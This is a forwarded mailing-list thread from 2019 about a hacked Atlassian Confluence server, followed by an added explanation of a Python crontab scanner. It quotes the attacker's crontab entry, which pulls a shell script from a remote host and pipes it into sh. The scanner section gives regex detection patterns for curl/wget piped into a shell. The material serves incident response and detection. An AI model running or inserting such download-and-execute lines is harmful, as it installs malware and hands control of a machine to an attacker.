Good day Guys
I just came across the following on the ClamAV mailing list.
Is this not something that can be added to Modsecurity ruleset?
For example look at '||wget' and ')|sh'.
Regards
Brent Clark
-------- Forwarded Message --------
Subject: [clamav-users] LSD Malwares
Date: Thu, 25 Apr 2019 14:52:05 +0530
From: Xavier Maysonnave via clamav-users <cla...@li...>
Reply-To: ClamAV users ML <cla...@li...>
To: cla...@li...
CC: Xavier Maysonnave <x.m...@gm...>
Dear Friends,
We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory on 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
we understood what happened on our server.
Confluence is running in its own user space and has seen its crontab
hacked.
On our Debian Stretch the 'crontab -u confluence -e' shows a non-legit
instruction:
*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh
Obviously the security flaw in Confluence opened the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg which
contains the shell script file didn't harm our server. No malware has
been deployed; however, the server was shutting down immediately after
starting.
We cleaned up the crontab and upgraded Confluence to avoid any further
infection.
However we need to check our installation and I'm wondering if ClamAV
already knows this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already opened a report to ClamAV. Is there any user who faced this
issue, and is ClamAV ready to detect and clean up our Linux boxes?
Any pointers to any information about this LSD Malware family will
be greatly appreciated as I try to evaluate the risks for our
infrastructure (I checked various DBs with no success and googled too).
Warmly.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
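As an added example (not code from either mail, nor from ClamAV or ModSecurity), here is a small host-side Python check that scans a crontab for the two tell-tale patterns Brent points at: a curl/wget download piped straight into a shell, and the '||wget' fallback chain. The sample crontab and its download host are constructed placeholders modelled on the quoted entry, and the regexes are assumptions, not a published signature.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab modelled on the entry quoted in the mail above.
# The download host is a placeholder, not the real one from the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/10 * * * * (curl -fsSL https://dl.example.invalid/i.jpg||wget -q -O- https://dl.example.invalid/i.jpg)|sh
@reboot /opt/confluence/bin/start-confluence.sh
30 2 * * 0 wget -q -O /tmp/data.csv https://reports.example.invalid/data.csv
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# A pipe feeding a shell or scripting interpreter, e.g. the ")|sh" tail of the entry.
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash|zsh|ksh|python[23]?|perl)\b(\s|$)")
# The "||wget" fallback: try curl, and if that fails, try wget.
FALLBACK_CHAIN = re.compile(r"\|\|\s*(curl|wget)\b")
# Five schedule fields (or an @reboot-style keyword), then the command.
CRON_LINE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$")


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list


def scan_crontab(text):
    """Return a Finding for every cron entry matching a download-and-execute pattern."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:  # environment lines such as MAILTO=... carry no command
            continue
        cmd = m.group("cmd")
        reasons = []
        if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("download piped into interpreter")
        if FALLBACK_CHAIN.search(cmd):
            reasons.append("curl/wget fallback chain")
        if reasons:
            findings.append(Finding(n, cmd, reasons))
    return findings
```

A plain wget that writes to a file (line 5 of the sample) is deliberately not flagged, since only the pipe into an interpreter is the dangerous part. The same two regexes are the kind of pattern one would carry over into a WAF rule over request arguments, as Brent suggests, but the check above only covers the crontab on the host.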